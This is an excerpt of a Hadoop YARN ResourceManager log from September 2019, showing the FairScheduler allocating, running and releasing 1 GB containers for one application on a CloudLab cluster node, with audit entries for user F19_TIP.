2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000004 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 15:25:51,544 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000011 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:51,544 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000011
2019-09-23 15:25:51,544 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 15:25:51,656 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569273478927_0002
2019-09-23 15:25:51,657 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000011 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:51,854 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000011 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:51,855 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000012 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:51,855 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000012
2019-09-23 15:25:51,855 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000012 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 15:25:51,901 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000013 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:51,901 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000013
2019-09-23 15:25:51,901 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000013 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 15:25:52,664 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000012 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:52,666 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000013 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000012 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000013 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000006 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000006 in state: COMPLETED event:FINISHED
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000006
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000006 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000005 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:52,910 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000005 in state: COMPLETED event:FINISHED
2019-09-23 15:25:52,911 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000005
2019-09-23 15:25:52,911 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 15:25:52,911 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000005 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: FINISHED
2019-09-23 15:25:52,913 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000014 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:52,913 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000014
2019-09-23 15:25:52,913 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000014 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 15:25:53,018 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000015 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:53,018 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000015
2019-09-23 15:25:53,018 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000015 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 15:25:53,041 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000016 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:53,041 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000016
2019-09-23 15:25:53,041 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000016 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available after allocation
2019-09-23 15:25:53,673 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000014 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:53,674 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000015 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:53,675 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000016 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000014 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000015 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000016 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000007 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000007 in state: COMPLETED event:FINISHED
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000007
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available, release resources=true
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000007 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=10 available=<memory:54272, vCores:22> used=<memory:11264, vCores:10> with event: FINISHED
2019-09-23 15:25:54,043 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000008 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:54,044 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000008 in state: COMPLETED event:FINISHED
2019-09-23 15:25:54,044 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000008
2019-09-23 15:25:54,044 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 15:25:54,044 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000008 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 15:25:54,045 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000017 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:54,045 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000017
2019-09-23 15:25:54,046 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000017 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 15:25:54,143 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000018 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:54,143 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000018
2019-09-23 15:25:54,143 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000018 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available after allocation
2019-09-23 15:25:54,683 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000017 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:54,685 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000018 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:55,144 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000017 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:55,145 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000018 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:55,145 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000010 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:55,146 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000010 in state: COMPLETED event:FINISHED
2019-09-23 15:25:55,146 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000010
2019-09-23 15:25:55,146 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available, release resources=true
2019-09-23 15:25:55,146 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000010 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=10 available=<memory:54272, vCores:22> used=<memory:11264, vCores:10> with event: FINISHED
2019-09-23 15:25:55,147 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000019 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:55,147 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000019
2019-09-23 15:25:55,148 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000019 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available after allocation
2019-09-23 15:25:55,229 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000020 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:55,229 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000020
2019-09-23 15:25:55,229 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000020 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 12 containers, <memory:13312, vCores:12> used and <memory:52224, vCores:20> available after allocation
2019-09-23 15:25:55,690 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569273478927_0002
2019-09-23 15:25:55,692 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000019 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:55,693 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000020 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:56,230 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000011 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:56,231 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000011 in state: COMPLETED event:FINISHED
2019-09-23 15:25:56,231 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000011
2019-09-23 15:25:56,231 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available, release resources=true
2019-09-23 15:25:56,231 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000011 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=11 available=<memory:53248, vCores:21> used=<memory:12288, vCores:11> with event: FINISHED
2019-09-23 15:25:56,698 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000019 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000019 in state: RELEASED event:RELEASED
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000019
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000019 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available, release resources=true
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000019 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=10 available=<memory:54272, vCores:22> used=<memory:11264, vCores:10> with event: RELEASED
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000020 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000020 in state: RELEASED event:RELEASED
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000020
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000020 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 15:25:56,699 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000020 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: RELEASED
2019-09-23 15:25:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000012 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000012 in state: COMPLETED event:FINISHED
2019-09-23 15:25:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000012
2019-09-23 15:25:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000012 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 15:25:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000012 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: FINISHED
2019-09-23 15:25:57,348 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000013 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:57,348 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000013 in state: COMPLETED event:FINISHED
2019-09-23 15:25:57,348 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000013
2019-09-23 15:25:57,348 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000013 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 15:25:57,348 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000013 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000014 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000014 in state: COMPLETED event:FINISHED
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000014
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000014 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000014 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000015 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000015 in state: COMPLETED event:FINISHED
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000015
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000015 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 15:25:57,464 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000015 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 15:25:58,175 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000016 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:58,175 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000016 in state: COMPLETED event:FINISHED
2019-09-23 15:25:58,175 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000016
2019-09-23 15:25:58,175 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000016 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
